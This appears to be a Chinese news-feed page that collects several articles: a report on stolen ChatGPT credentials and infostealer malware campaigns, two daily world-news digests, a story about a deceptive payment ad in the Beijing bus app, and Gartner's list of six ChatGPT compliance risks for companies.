2022年6月至2023年5月期间，超过101100个被盗的OpenAI ChatGPT帐户凭证在非法暗网市场中被发现，仅印度就有12632个被盗的凭证。 Group-IB公司在一份报告中表示，这些凭证是在地下网络犯罪出售的信息窃取日志中发现的。 这家总部位于新加坡的公司表示：“包含被盗取ChatGPT帐户的可用日志数量在2023年5月达到26802个的峰值。”“在过去的一年里，亚太地区经历了最集中的ChatGPT凭证被提供出售的情况。” ChatGPT凭证被盗数量最多的其他国家包括巴基斯坦、巴西、越南、埃及、美国、法国、摩洛哥、印度尼西亚和孟加拉国。 进一步的分析显示，大多数包含ChatGPT账户的日志被臭名昭著的Raccoon信息窃取工具盗取（78348），其次是Vidar（12984）和RedLine（6773）。 信息窃取工具因其能够从浏览器和加密货币钱包扩展劫持密码、cookie、信用卡和其他信息而受到网络犯罪分子的欢迎。 Group-IB表示：“包含信息窃取工具收集的被盗信息的日志在暗网市场上活跃交易。” “有关此类市场上可用日志的其他信息包括日志中找到的域名列表以及有关受感染主机的IP地址的信息。” 它们通常基于订阅定价模式提供，不仅降低了网络犯罪的门槛，而且还成为使用被盗凭证发起后续攻击的渠道。 Group-IB威胁情报主管Dmitry Shestakov表示：“许多企业正在将ChatGPT集成到他们的运营流程中。” “员工输入机密信件或使用机器人优化专有代码。鉴于ChatGPT的标准配置保留了所有对话，如果威胁行为者获得账户凭证，这可能会无意中为他们提供敏感情报的宝库。“ 为了减轻此类风险，建议用户遵循适当的密码要求习惯，并使用双因素身份验证（2FA）保护其帐户，以防止帐户被接管攻击。 这一发展是在一个正在进行的恶意软件活动中出现的，该活动利用假的OnlyFans网页和成人内容的诱惑来提供一个远程访问木马和一个名为DCRat（或DarkCrystal RAT）的信息窃取器，这是AsyncRAT的一个修改版本。 eSentire公司研究人员表：“在观察到的情况下，受害者被引诱下载包含手动执行的VBScript加载程序的ZIP文件。”并指出该活动自2023年1月以来一直在进行。 “文件命名惯例表明，受害者是被利用各种成人电影女演员的露骨照片或OnlyFans内容被引诱的。” 这也是在发现一种名为GuLoader（又名CloudEyE）的恶意软件的新VBScript变体之后，它采用了以税收为主题的诱饵来启动PowerShell脚本，能够检索并将Remcos RAT注入合法的Windows进程中。 这家加拿大网络安全公司在本月早些时候发布的一份报告中表示：“GuLoader是一种高度规避的恶意软件加载程序，通常用于提供信息窃取者和远程管理工具（RAT）。” “GuLoader利用用户启动的脚本或快捷方式文件来执行多轮高度混淆的命令和加密的shellcode。其结果是一个内存驻留的恶意软件有效载荷在一个合法的Windows进程内运行。” OpenAI在一份声明中称：“Group-IB的威胁情报报告的调查结果是人们在设备上被种植恶意软件的结果，而不是OpenAI的数据泄露行为。” “我们目前正在调查已泄露的帐户。OpenAI维护了对用户进行身份验证和授权使用包括ChatGPT在内的服务的行业最佳实践，我们鼓励用户使用强密码并仅在个人计算机上安装经过验证和可信的软件。”...

6月7日，农历润四月二十，星期三 在这里，每天60秒读懂世界 1、广东：高考期间若遇"停课预警"将"停课不停考"；中国中等收入群体已超4亿人，标准曝光：家庭年收入10万元以上； 2、北京：发现两例猴痘病例，为境外输入，两名病例均是通过亲密接触感染； 3、国铁集团恢复动车组大规模采购，103组复兴号动车组，3万辆铁路货车，首批订单或达500亿元； 4、山西：对发生重大林草资源案件、重大林草火灾、重大有害生物灾害的，要严肃追究属地总林长责任； 5、浙江台州：椒江区一渔船4日在维修改造时发生火灾，致4名施工人员死亡；浙江宁海：6日下午，康尔内衣厂区发生机器设备事故，致2人死亡；6日下午，长沙开福一39岁男子驾驶面包车在连撞9人后弃车逃跑，目前已落网； 6、广东肇庆一业主购2楼42套房欲打通：挖掘机吊到室内作业，楼上住宅现裂缝。官方：已移送城管局，初步复核暂不存在结构安全问题；广州拟出新规：电动自行车将分层次、分时段限行； 7、"江西南昌高校鼠头鸭脖"事件争议不断，动物专家发声：若图片属实，80％概率为鼠头； 8、苹果首款头显Vision Pro发布: 采用外置电池设计，通过眼睛、手势和语音实现交互，将于明年上市，售价3499美元。发布会后，苹果股价跌0.76%，市值蒸发6000亿； 9、美方以销售压片机、模具等设备涉芬太尼为由，宣布制裁7个中国实体和6名个人，商务部回应：美方罔顾事实转嫁责任，中方坚决反对； 10、美国共和党总统候选人拉马斯瓦米建议台湾家庭拥枪，外交部回应：不要拿台湾民众当炮灰； 11、马来西亚政府提法案：拟对2007年后出生公民全面禁烟；5日，印度奥里萨邦再次发生列车脱轨事故：系私营水泥厂货运火车，暂无人员伤亡； 12、日媒：福岛第一核电站核污染水排海隧道已于5日下午开始注入海水，核污水排海计划也由此进入最后阶段；日本女子因华航空姐没讲日语暴怒辱骂，航司：致延误40分钟，最后被航警带离； 13、根据中俄年度合作计划，双方6日在日本海、东海相关空域组织实施第6次联合空中战略巡航； 14、外媒：美前情报官员举报称，美国已从坠毁UFO中发现"外星"技术，并利用UFO零件制造武器；北溪管道爆炸新线索：爆破点附近发现潜水靴，与美海军高度相似； 15、外媒：当地6日，乌南部卡霍夫卡大坝被炸毁，正在持续坍塌，已近半！下游新卡霍夫卡市水位上涨已超12米！大量房屋被淹，俄乌互相指责系对方所为；俄国防部：5日，击退乌军在南顿涅茨克的进攻，歼敌1500人、摧毁8辆豹式坦克； 【微语】此去前程远大，你一人，便是千军万马，少年，愿你先折桂花，再逐梦天涯。...

6月5日，农历润四月十八，星期一 在这里，每天60秒读懂世界 1、4日6时33分，神舟十五号载人飞船返回舱成功着陆，带回了拟南芥微重力研究样品，三名航天员报告感觉良好，神舟十五号载人飞行任务取得圆满成功；中国空间站多项太空实验有序展开，首次实现人类干细胞太空早期造血； 2、工信部部长：将加快5G行业虚拟专网建设，全面推进6G技术研发； 3、河南：6月5日至7日小麦抢收重心将转至黄河以北地区，省委书记：已进入决战阶段； 4、4日6时许，四川乐山金口河一国有林场附近发生高位山体垮塌，下方是一矿业公司施工驻地，已造成19人遇难，当地村民：滑落碎石压了宿舍。目前搜救已结束； 5、3日晚，河南洛阳一景观人工湖因暴雨涨水，雨水漫过台阶，两年轻女孩开车误入溺亡，家属：人工湖与机动车道之间没有围栏； 6、加媒：美加军舰3日过航台湾海峡时，中国军舰横切逼美舰改道，险些相撞。美印太司令部：中国导弹驱逐舰逼退美舰"不安全"；中国国防部长：请各国管好自己的军舰飞机。专家:中国军队近距离驱赶将成新常态； 7、多国曾现人类偏肺病毒(HMPV)感染，目前尚无治疗药物和疫苗，常见症状包括咳嗽、发烧、鼻塞、呼吸短促，可发展为支气管炎或肺炎，《柳叶刀》：在2018年已有1.6万儿童死亡； 8、美方称美助理国务卿将于4日至10日访问中国和新西兰，外媒：寻求加强对华沟通； 9、台风"玛娃"影响日本多地，多地强降雨引发洪水、山体滑坡等灾害，已造成2死35伤4失联，约230栋住宅受损，多地停电断水，新干线一度停运； 10、阿联酋5月底宣布：已退出美国主导的"联合海上力量"两个月了，媒体：中东一个新的时代来临；外媒：石油价格疲软，"欧佩克+"考虑进一步减产； 11、巴黎圣日耳曼官宣梅西离队，将签约沙特利雅得新月，报价4亿欧年薪。皇马官宣本泽马离队，其将加盟沙特联冠军吉达联合，税后年薪1亿欧+签约两年。C罗、梅西、本泽马将齐聚沙特； 12、乌干达总统："青年党"武装分子于上周围攻了非洲联盟在索马里的一个基地，大约54名乌干达维和人员因此丧生； 13、金与正痛批：安理会响应"美国强盗要求"，将朝鲜发射侦察卫星作为单独议案讨论，是对真正使命的玩忽职守，盲目跟风美国谴责朝鲜的国家，丑态毕露； 14、印度官方：列车相撞事故救援已完成，正努力恢复铁路服务，死亡人数为275人。印度铁道部部长：事故的发生是"由于电子联锁装置发生变化"。"原因已确定，责任人也已确定"； 15、俄国防部：俄军4日凌晨用高精度武器打击乌军机场，打击目标已实现。指挥所、雷达站、航空技术装备以及武器弹药库都被击毁；北约秘书长与土耳其总统举行会面：为"入约"，瑞典已采取重要步骤以解决土耳其担忧； 【微语】简单事不争吵，复杂事不烦恼。发火时不讲话，生气时不决策。...

图片摄影作者：匡达 界面新闻记者 |丁晶晶 近日，有网友反映，其在使用北京公交APP时，遇到诈骗广告，该广告伪装成登录入口，十分隐蔽，稍不注意就会被扣29.8元。在时度视频报道中，网友点击进入北京公交APP后，页面底部出现“您还未登录”字样的广告，点击进入后输入手机号码点击同意登录，该广告会自动跳转支付宝，如果用户开通免密支付，那么该广告就会直接扣除29.8元。而支付宝上支付信息显示，该商户将每隔7日自动扣费29.8元。时度视频截图5月30日，针对此事，北京公交集团回应表示，针对网传的“北京公交APP”广告问题，北京公交集团发现网上相关情况，立即开展调查后，向“北京公交APP”运营商启迪公交（北京）科技股份有限公司发函要求其迅速整改，目前启迪公交已下线弹窗广告。公开资料显示，北京公交APP是由北京公共交通控股（集团）有限公司和启迪公交（北京）科技股份有限公司（以下简称“启迪公交”）联合打造的一款北京智慧公共出行官方手机软件，开发者为启迪公交。界面新闻浏览北京公交APP发现，在进入页面底部也显示“运营方：启迪公交”字样。启迪公交由北京公交集团的全资子公司北京公交集团资产管理有限公司、启迪控股的全资子公司启迪科技城集团有限公司、北京融沛数据科技有限公司和北京交通集团控股上市公司北京巴士传媒股份有限公司四方于2018年共同发起设立。其中，启迪公交下属全资子公司启交智云承担北京公交刷码乘车系统的设备维护、系统运维、技术开发和客户服务工作。天眼查显示，启迪公交股东中，启迪控股持股35.25%，北京公交集团作为第二大股东持股29.7%。此外，北京公交还是北京巴士传媒股份有限公司的最大股东，通过北京巴士传媒持股启迪公交5.5%。但自去年，百度贴吧和微博上频频传闻启迪公交“跑路”，北京公交APP交由其他方运营。界面新闻发现，天眼查平台上，启迪公交牵涉的一起和中国移动通信的合同纠纷中，启迪公交曾表示，自2022年3月起，北京公交二维码刷码乘车系统的运营维护工作二被告已移交给公交集团。据天眼查该案件文书信息，2022年3月18日，启迪公司向中国移动发出告知函，表示2019年至2022年3月，其提供北京公交刷码乘车业务相关服务已长达3年之多，在没有收到公交集团服务费的情况下，忍辱负重，扎实保障了刷码乘车系统的稳定运营，保障了公共安全和广大乘客的出行权益。应北京公交集团关于数据安全的要求，已将刷码乘车业务安全交接给公交集团，不再提供刷码乘车业务服务。界面新闻拨打启迪公交热线电话，语音提示其未交电话费用而未接通。去年8月，微博博主“北京交通大作战”也曾爆料，北京公交集团和启迪公交出现摩擦，因此北京公交集团独立开发了“一路同行”APP。就此事情的相关细节，界面新闻咨询北京公交集团，截至发稿，北京公交未作答复。   ...

ChatGPT在全球科技行业掀起了生成式人工智能的“军备竞赛”，但是人们对生成式人工智能（AIGC）的合规风险普遍认识不足。 Gartner最近撰文指出，企业法务和合规负责人应该认知并解决企业面临的六种ChatGPT（包括其他基于大语言模型的生成式人工智能工具）合规风险，并开始建立护栏确保企业能安全且负责任地使用生成式人工智能工具。 “ChatGPT和其他大型语言模型工具容易产生多种风险，”Gartner法律与合规实践高级总监分析师冉弗里德曼（Ron Friedmann）指出：“法律和合规领导者应评估这些问题是否对其企业构成重大风险，以及在企业内部及其第三方/多方推广AI应用时企业内部需要采取哪些控制措施。否则，企业可能会面临法律、声誉和财务方面的严重后果。 法务和合规负责人应评估的六大ChatGPT风险包括（同样适用于其他大语言模型工具）： 01 捏造的或失实信息 ChatGPT和其他大语言模型工具最常见的问题是倾向于提供不正确的（尽管表面上合理的）信息。 “ChatGPT也容易产生'幻觉'，包括捏造答案，以及不存在的法律或科学引用，”弗里德曼说：“法律和合规领导者应该发布指导意见，要求员工在采信答案之前审查大语言模型工具生成内容是否准确、恰当和实用。” 02 数据隐私和机密性 法律和合规领导者应该意识到，输入到ChatGPT中的任何信息，如果未关闭聊天记录功能，都可能成为其训练数据集的一部分。 “提示词中使用的敏感、专有或机密信息可能会被用于回复企业外部用户的提问，”弗里德曼说：“法律和合规部门需要为ChatGPT的使用建立一个合规框架，并明确禁止将敏感的组织或个人数据输入公共大语言模型工具。 03 模型和输出偏差 尽管OpenAI努力减少ChatGPT中的偏见和歧视，但这些问题的案例已经频频发生，尽管OpenAI和其他公司正在积极努力将这些风险降至最低，但这个问题可能会永远存在。 “大语言模型不太可能完全消除偏见，因此法务和合规人员需要掌握管理人工智能偏见的法律，并确保合规性，”弗里德曼说：“这可能需要与专家合作，以确保人工智能生成可靠内容，并通过审计和技术功能进行数据质量控制。” 04 知识产权（IP）和版权风险 大语言模型工具，尤其是ChatGPT，训练时使用了大量互联网数据，其中可能包括受版权保护的材料。因此，ChatGPT之类的大语言模型输出的内容也有可能侵犯版权或知识产权保护。 “ChatGPT没有提供其内容生成的具体原理和机制，”弗里德曼说：“法律和合规领导者应该密切关注适用于ChatGPT（以及其他生成式人工智能工具）输出内容相关版权法规的任何变化，并要求用户仔细审查他们生成的内容，以确保不侵犯版权或知识产权。” 05 网络欺诈风险 不法分子已经在滥用ChatGPT来大规模生成虚假信息（例如，虚假评论）。 此外，集成或接入大语言模型模型（包括ChatGPT）的应用程序也容易受到提示注入攻击的影响。所谓提示注入攻击是一种黑客技术，攻击者使用恶意对抗性提示诱骗人工智能模型执行违反其内容审核规则的任务，例如编写恶意软件代码或开发网络钓鱼站点。 “法务和合规领导者应与网络安全风险负责人协调，探讨是否或何时就此问题向公司网络安全人员发布备忘录，”弗里德曼补充道：“他们还应该对信息来源进行尽职调查和审计，以验证信息的质量。 06 消费者保护风险 如果企业的应用（例如客服聊天机器人）未能向消费者披露是否使用了生成式人工智能技术（例如ChatGPT），企业将面临失去客户信任的风险，甚至可能遭到起诉。 例如，美国加利福尼亚州的聊天机器人法律要求，在某些消费者互动中，企业必须清晰、明确地告知消费者正在与机器人进行交流。 法务和合规负责人需要确保企业的大语言模型应用（例如ChatGPT）符合所在司法辖区内的所有相关法规和法律，并已向客户进行了适当的披露。   ...